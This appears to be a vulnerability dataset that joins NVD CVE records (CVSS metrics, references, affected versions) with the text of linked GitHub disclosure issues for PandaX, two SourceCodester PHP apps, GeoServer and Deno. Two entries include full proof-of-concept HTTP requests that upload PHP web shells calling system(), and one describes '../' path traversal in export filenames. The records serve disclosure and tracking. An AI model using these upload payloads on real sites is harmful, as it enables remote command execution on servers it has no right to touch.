"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PandaXGO/PandaX/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.257063"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.257063"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PandaXGO/PandaX/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.257063"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.257063"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pandax:pandax:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09811585-2FBA-46CC-95B6-684FDADF7CA3",
"versionEndExcluding": null,
"versionEndIncluding": "2024-03-10",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"24"
] | 24 | https://github.com/PandaXGO/PandaX/issues/6 | [
"Issue Tracking"
] | github.com | [
"PandaXGO",
"PandaX"
] | # pandax excel 导出任意文件覆盖 或 任意文件下载
<https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/user.go#L153-L161>
<https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/role.go#L84-L92>
<https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/dict.go#L65-L73>
这三处路由,之后都会调用 `utils.InterfaceToExcel(*list, fileName)` 然后 `rc.Download(fileName)`
选其中一个来看
代码中没有对传入的 `filename` 做检查,使用 `../` 跨目录指定导出的 excel 文件名及目录位置,可以用来覆盖掉不应该覆盖的文件
<https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/api/user.go#L326-L342>
而且,如果该目标文件没有写权限的话,之后 `rc.Download(fileName)` 又会将这个文件下载下来,就变成了文件读取了
但是调用的是 `http.ServeFile`,只能用来读取项目目录下的文件,无法读取 `/etc/passwd` 等系统文件
<https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/kit/restfulx/restfulx.go#L84-L92>
比如这样子去覆盖掉 template 文件


| pandax excel 导出 任意文件覆盖 或 任意文件下载 | https://api.github.com/repos/PandaXGO/PandaX/issues/6/comments | 1 | 2024-03-10T03:34:17Z | 2024-12-04T09:34:30Z | https://github.com/PandaXGO/PandaX/issues/6 | 2,177,505,961 | 6 | 6,007 |
CVE-2024-2690 | 2024-03-20T10:15:11.250 | A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file /uupdate.php. The manipulation of the argument ima leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257388. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wkeyi0x1/vul-report/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257388"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wkeyi0x1/vul-report/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257388"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:razormist:online_discussion_forum_site:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1F9F37D-C115-4EC6-A1DD-FFB3869E79C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/wkeyi0x1/vul-report/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wkeyi0x1",
"vul-report"
] | # Online Discussion Forum Site - Arbitrary file vulnerability uploading leads to command execution
+ Author: liwenjie
# Vendor Homepage
+ https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link
+ https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Overview
+ liwenjie has discovered a vulnerability classified as critical in Online Discussion Forum Site. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE.
# Vulnerability Details
+ Online Discussion Forum Site V1.0
+ Vulnerable File: uupdate.php
+ Parameter Names: filename
+ Attack Type: Remote
# Description
+ A vulnerability, which was classified as critical, has been found in Online Discussion Forum Site. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability.
# Proof of Concept (PoC) :
<img width="1189" alt="17" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/8fbe4287-8f8e-4eb6-8b68-2bc97beb155f">
```
POST /uupdate.php HTTP/1.1
Host: www.online-discussion-forum-site.com:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34962993677915401761480767727
Content-Length: 1226
Origin: http://www.online-discussion-forum-site.com:8090
Connection: close
Referer: http://www.online-discussion-forum-site.com:8090/register.php
Upgrade-Insecure-Requests: 1
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="u_name"
a8
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="f_name"
a8
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="pwd"
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="e_mail"
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="gender"
1
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="dob"
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="ima"; filename="a.php"
Content-Type: text/plain
<?php system("whoami");
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="add"
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="sta"
-----------------------------34962993677915401761480767727
Content-Disposition: form-data; name="cou"
-----------------------------34962993677915401761480767727--
```
<img width="696" alt="18" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/d92d52c1-45b8-4a03-8753-b377c94b529f">
# Location of vulnerabilities in source code
<img width="338" alt="19" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/cb00fe01-2076-4d4d-933c-c890aeadac8b">
| Online Discussion Forum Site - Arbitrary file vulnerability uploading leads to command execution - NEW VUL | https://api.github.com/repos/wkeyi0x1/vul-report/issues/2/comments | 0 | 2024-03-19T17:57:09Z | 2024-03-19T17:57:09Z | https://github.com/wkeyi0x1/vul-report/issues/2 | 2,195,621,125 | 2 | 6,008 |
CVE-2024-23643 | 2024-03-20T18:15:09.047 | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.2 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator’s browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default and granting non-administrators access to this endpoint is not recommended. Versions 2.23.2 and 2.24.1 contain a fix for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/issues/1172"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/pull/1174"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/issues/1172"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/pull/1174"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F58354C1-10A5-4A55-8A22-7DADEEC5ED15",
"versionEndExcluding": "2.23.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:geoserver:geoserver:2.24.0:-:*:*:*:*:*:*",
"matchCriteriaId": "3EB58700-BA62-496A-BA24-5A08942C1BD3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/GeoWebCache/geowebcache/issues/1172 | [
"Issue Tracking"
] | github.com | [
"GeoWebCache",
"geowebcache"
] | null | Improve handling special characters in the GWC Seed Form | https://api.github.com/repos/GeoWebCache/geowebcache/issues/1172/comments | 0 | 2023-10-10T16:27:09Z | 2023-11-20T11:20:26Z | https://github.com/GeoWebCache/geowebcache/issues/1172 | 1,935,749,537 | 1,172 | 6,009 |
CVE-2024-23821 | 2024-03-20T18:15:10.407 | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/issues/1171"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/pull/1173"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/issues/1171"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/GeoWebCache/geowebcache/pull/1173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "73E1A204-C95D-4B7B-8C8A-E5639834BB97",
"versionEndExcluding": "2.23.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:geoserver:geoserver:2.24.0:-:*:*:*:*:*:*",
"matchCriteriaId": "3EB58700-BA62-496A-BA24-5A08942C1BD3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/GeoWebCache/geowebcache/issues/1171 | [
"Issue Tracking"
] | github.com | [
"GeoWebCache",
"geowebcache"
] | null | Improve handling special characters in the GWC Demos Page | https://api.github.com/repos/GeoWebCache/geowebcache/issues/1171/comments | 0 | 2023-10-10T16:26:17Z | 2023-11-20T11:20:28Z | https://github.com/GeoWebCache/geowebcache/issues/1171 | 1,935,748,316 | 1,171 | 6,010 |
CVE-2024-27935 | 2024-03-21T02:52:22.627 | Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.35.1 and prior to version 1.36.3, a vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior. This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly. Version 1.36.3 contains a patch for this issue.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/denoland/deno/issues/20188"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/denoland/deno/issues/20188"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:deno:deno:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9C495C2E-08BD-43EB-9210-6FF31E09ECCF",
"versionEndExcluding": "1.36.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.35.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"488"
] | 488 | https://github.com/denoland/deno/issues/20188 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"denoland",
"deno"
] | ## Issue Description
When testing two pairs of independent server-socket connections using the provided code, an unexpected data cross-reception issue occurs. The setup involves creating two separate servers, each with their corresponding client socket. The servers receive data from their respective sockets and echo the data back. However, during the test, the data sent by one socket is received by the other socket. This issue leads to incorrect data reception and potential data corruption.
This issue affects any Deno code using node packages that rely on `require(net)`. Example:. having 2 `ioredis.Redis` clients connecting to 2 Redis Servers results in issues since one client might receive data from the other client which does not correspond with the actual redis command being sent, thus it results in unexpected errors.
## Steps to Reproduce
1. Create a Deno test file named `socket.test.ts` with the provided test code.
2. Run the test using the command: `deno test -A ./socket.test.ts`
## Expected Behavior
The expected behavior is that each socket should receive the data it sent, without any cross-reception. Specifically:
* Socket1 should send "111-111-111" and receive "111-111-111".
* Socket2 should send "222-222-222" and receive "222-222-222".
## Actual Behavior
After running the test, the issue arises where:
* Socket1 receives "222-222-222" instead of the expected "111-111-111".
* Socket2 receives "222-222-222" as expected.
## Environment Details
```
// deno --version
deno 1.36.1 (release, x86_64-unknown-linux-gnu)
v8 11.6.189.12
typescript 5.1.6
```
## Test Code
```ts
// socket.test.ts
import { assertEquals } from "https://deno.land/std@0.198.0/assert/assert_equals.ts";
import net_1 from "node:net";
function setupServerSocketPair(port: number): {
socket: net_1.Socket,
res: string[]
} {
const server = Deno.listen({ port, transport: "tcp" });
const socket = net_1.createConnection({ port });
const res: string[] = [];
(async () => {
for await (const conn of server) {
conn.readable.pipeTo(conn.writable);
}
})();
socket.on("data", (data: Uint8Array) => {
res.push(new TextDecoder().decode(data));
});
return {
socket,
res
};
}
Deno.test({
name: "Multiple Sockets should get correct server data",
sanitizeResources: false,
sanitizeOps: false,
}, async () => {
const setup1 = setupServerSocketPair(10001);
const setup2 = setupServerSocketPair(20002);
assertEquals(setup1.socket.write("111-111-111"), true);
assertEquals(setup2.socket.write("222-222-222"), true);
// hacky way to wait for socket to receive the data back
await new Promise((r) => setTimeout(r, 200));
console.log({ res1: setup1.res, res2: setup2.res });
assertEquals(setup1.res, [ "111-111-111" ]); // This fails !!! Actual / Expected "222-222-222"/ "111-111-111"
assertEquals(setup2.res, [ "222-222-222" ]);
});
``` | "node:net.Socket": Data Cross-Reception Issue Between Independent Server-Socket Pairs | https://api.github.com/repos/denoland/deno/issues/20188/comments | 6 | 2023-08-17T08:30:44Z | 2023-09-08T10:20:35Z | https://github.com/denoland/deno/issues/20188 | 1,854,522,183 | 20,188 | 6,011 |
CVE-2024-2754 | 2024-03-21T07:15:47.193 | A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wkeyi0x1/vul-report/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257544"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wkeyi0x1/vul-report/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.257544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.257544"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:donbermoy:complete_e-commerce_site:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "511AE27B-E018-462D-83A9-DFF550393621",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/wkeyi0x1/vul-report/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wkeyi0x1",
"vul-report"
] | # Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution
+ Author: Shuning Yue
# Vendor Homepage
+ https://www.sourcecodester.com/php/14234/complete-e-commerce-site-phpmysqli.html
# Software Link
+ https://www.sourcecodester.com/download-code?nid=14234&title=Complete+E-Commerce+Site+in+PHP%2FMySQLi
# Overview
+ Yue Shuning from Huazhong University of Science and Technology has discovered a vulnerability classified as critical in Complete E-Commerce Site in PHP/MySQLi V1.0. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE.
# Vulnerability Details
+ Complete E-Commerce Site in PHP/MySQLi V1.0
+ Vulnerable File: admin/users_photo.php
+ Parameter Names: filename
+ Attack Type: Remote
# Description
+ A vulnerability, which was classified as critical, has been found in Complete E-Commerce Site in PHP/MySQLi. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability.
# Note
+ To exploit this vulnerability, users need to log in, and the website allows any user to register by default.
+
# Proof of Concept (PoC) :
<img width="1191" alt="1" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/247e0fc3-0d34-4aa8-b7be-c17800fd66a2">
```
POST /admin/users_photo.php HTTP/1.1
Host: www.ecommerce.com:8091
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145108311014335905531894526533
Cookie: PHPSESSID=XXXXXXXXXX
Upgrade-Insecure-Requests: 1
Content-Length: 359
-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png
<?php system("ipconfig");
-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="upload"
1
-----------------------------145108311014335905531894526533--
```
<img width="657" alt="2" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/b62c60a2-975a-4d7d-ac5e-2fc51a0c38c2">
